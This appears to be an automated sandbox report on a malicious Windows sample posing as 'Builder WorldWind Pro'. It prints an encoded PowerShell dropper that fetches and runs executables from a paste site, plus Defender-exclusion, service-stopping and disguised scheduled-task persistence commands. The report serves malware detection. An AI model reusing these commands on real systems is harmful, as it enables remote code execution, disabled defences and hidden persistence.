Analysis

  • max time kernel
    11s
  • max time network
    32s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/06/2023, 16:51

General

  • Target

    Builder WorldWind Pro/Builder WorldWind Pro/Builder WorldWind Pro.exe

  • Size

    73KB

  • MD5

    15b7bffd31462f0ca361a1c2b2211f86

  • SHA1

    bdf831203ded29b82e4aa989f26fea441b6a20ba

  • SHA256

    1ef388812d9c21af5a0a508d5a37561deba51dcbebe9f8a5a9a7397300865580

  • SHA512

    c48fd5855527f2e2615b3614ad43c025fac85ef1538de2a52a6267e3e61be611b04854bbcad54111c56f3ce661159b94d1639414cb0ce0086f466163ed0d3153

  • SSDEEP

    768:6o9jqvFupCbxbbcaqcCNXdca6Nt//cO3wmhrV2pL:V9mN7B33dw

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/nipkv/raw

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3156
      • C:\Users\Admin\AppData\Local\Temp\Builder WorldWind Pro\Builder WorldWind Pro\Builder WorldWind Pro.exe
        "C:\Users\Admin\AppData\Local\Temp\Builder WorldWind Pro\Builder WorldWind Pro\Builder WorldWind Pro.exe"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1628
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAZQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQByAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB6AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZAB6AHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAeAByAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAGUAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAdgBsAHcAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB5AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AGYAZwAjAD4A"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3516
          • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e30.exe
            "C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e30.exe"
            4⤵
            • Executes dropped EXE
            PID:4944
          • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e31.exe
            "C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e31.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1208
          • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e32.exe
            "C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e32.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:5024
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1224
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:4480
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:844
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:2324
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:4908
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:1256
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1016
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2336
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4116
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:668
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:452
      • C:\Windows\System32\dialer.exe
        C:\Windows\System32\dialer.exe
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2856
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4868

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      2247453c28acd1eb75cfe181540458a8

      SHA1

      851fc5a9950d422d76163fdc6a453d6859d56660

      SHA256

      358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd

      SHA512

      42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      2e907f77659a6601fcc408274894da2e

      SHA1

      9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

      SHA256

      385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

      SHA512

      34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

    • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e30.exe

      Filesize

      3.8MB

      MD5

      d1529aa798dfc7fe269926f5594b467b

      SHA1

      99f46134e97b9f7468ad7ab7c3a79cc3b8260664

      SHA256

      958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3

      SHA512

      5d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41

    • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e30.exe

      Filesize

      3.8MB

      MD5

      d1529aa798dfc7fe269926f5594b467b

      SHA1

      99f46134e97b9f7468ad7ab7c3a79cc3b8260664

      SHA256

      958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3

      SHA512

      5d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41

    • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e30.exe

      Filesize

      3.8MB

      MD5

      d1529aa798dfc7fe269926f5594b467b

      SHA1

      99f46134e97b9f7468ad7ab7c3a79cc3b8260664

      SHA256

      958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3

      SHA512

      5d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41

    • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e31.exe

      Filesize

      5.8MB

      MD5

      5f2f1ae240812065799e8c05d3a01aa7

      SHA1

      e14d1c6a64f27267c688b695da84b7a9527a3d13

      SHA256

      adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03

      SHA512

      d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50

    • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e31.exe

      Filesize

      5.8MB

      MD5

      5f2f1ae240812065799e8c05d3a01aa7

      SHA1

      e14d1c6a64f27267c688b695da84b7a9527a3d13

      SHA256

      adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03

      SHA512

      d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50

    • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e32.exe

      Filesize

      91KB

      MD5

      17d1a593f7481f4a8cf29fb322d6f472

      SHA1

      a24d8e44650268f53ca57451fe564c92c0f2af35

      SHA256

      f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

      SHA512

      8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

    • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e32.exe

      Filesize

      91KB

      MD5

      17d1a593f7481f4a8cf29fb322d6f472

      SHA1

      a24d8e44650268f53ca57451fe564c92c0f2af35

      SHA256

      f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

      SHA512

      8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

    • C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e32.exe

      Filesize

      91KB

      MD5

      17d1a593f7481f4a8cf29fb322d6f472

      SHA1

      a24d8e44650268f53ca57451fe564c92c0f2af35

      SHA256

      f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

      SHA512

      8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4vo0rpvt.r3e.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/436-234-0x00000245DA520000-0x00000245DA547000-memory.dmp

      Filesize

      156KB

    • memory/436-226-0x00000245DA520000-0x00000245DA547000-memory.dmp

      Filesize

      156KB

    • memory/436-228-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/528-243-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/528-240-0x000001F15FB40000-0x000001F15FB67000-memory.dmp

      Filesize

      156KB

    • memory/584-230-0x0000022C58C10000-0x0000022C58C37000-memory.dmp

      Filesize

      156KB

    • memory/584-206-0x0000022C58C10000-0x0000022C58C37000-memory.dmp

      Filesize

      156KB

    • memory/584-204-0x0000022C58B80000-0x0000022C58BA1000-memory.dmp

      Filesize

      132KB

    • memory/584-209-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/672-231-0x000001C0D9D70000-0x000001C0D9D97000-memory.dmp

      Filesize

      156KB

    • memory/672-207-0x000001C0D9D70000-0x000001C0D9D97000-memory.dmp

      Filesize

      156KB

    • memory/672-210-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/684-238-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/684-236-0x00000254A6580000-0x00000254A65A7000-memory.dmp

      Filesize

      156KB

    • memory/956-232-0x000001A11FFA0000-0x000001A11FFC7000-memory.dmp

      Filesize

      156KB

    • memory/956-220-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/956-216-0x000001A11FFA0000-0x000001A11FFC7000-memory.dmp

      Filesize

      156KB

    • memory/1020-233-0x000001FE3DB00000-0x000001FE3DB27000-memory.dmp

      Filesize

      156KB

    • memory/1020-221-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/1020-217-0x000001FE3DB00000-0x000001FE3DB27000-memory.dmp

      Filesize

      156KB

    • memory/1028-246-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/1028-244-0x000001E2F3190000-0x000001E2F31B7000-memory.dmp

      Filesize

      156KB

    • memory/1044-247-0x000001EEF4340000-0x000001EEF4367000-memory.dmp

      Filesize

      156KB

    • memory/1044-249-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/1180-253-0x0000014C6A480000-0x0000014C6A4A7000-memory.dmp

      Filesize

      156KB

    • memory/1180-254-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/1200-256-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/1200-255-0x000002A7CF120000-0x000002A7CF147000-memory.dmp

      Filesize

      156KB

    • memory/1208-212-0x00007FF794B80000-0x00007FF79514C000-memory.dmp

      Filesize

      5.8MB

    • memory/1296-261-0x00000292B1000000-0x00000292B1027000-memory.dmp

      Filesize

      156KB

    • memory/1296-262-0x00007FFAC4410000-0x00007FFAC4420000-memory.dmp

      Filesize

      64KB

    • memory/1628-133-0x0000000000B10000-0x0000000000B28000-memory.dmp

      Filesize

      96KB

    • memory/2856-215-0x00007FF6B1ED0000-0x00007FF6B1EF9000-memory.dmp

      Filesize

      164KB

    • memory/2856-192-0x00007FFB04390000-0x00007FFB04585000-memory.dmp

      Filesize

      2.0MB

    • memory/2856-193-0x00007FFB02720000-0x00007FFB027DE000-memory.dmp

      Filesize

      760KB

    • memory/3516-147-0x00000151D7010000-0x00000151D7020000-memory.dmp

      Filesize

      64KB

    • memory/3516-146-0x00000151D7010000-0x00000151D7020000-memory.dmp

      Filesize

      64KB

    • memory/3516-136-0x00000151F17B0000-0x00000151F17D2000-memory.dmp

      Filesize

      136KB

    • memory/3516-135-0x00000151D7010000-0x00000151D7020000-memory.dmp

      Filesize

      64KB

    • memory/3516-148-0x00000151D7010000-0x00000151D7020000-memory.dmp

      Filesize

      64KB

    • memory/4868-225-0x000001AC370A0000-0x000001AC370B0000-memory.dmp

      Filesize

      64KB

    • memory/4868-227-0x000001AC370A0000-0x000001AC370B0000-memory.dmp

      Filesize

      64KB

    • memory/4868-218-0x000001AC370A0000-0x000001AC370B0000-memory.dmp

      Filesize

      64KB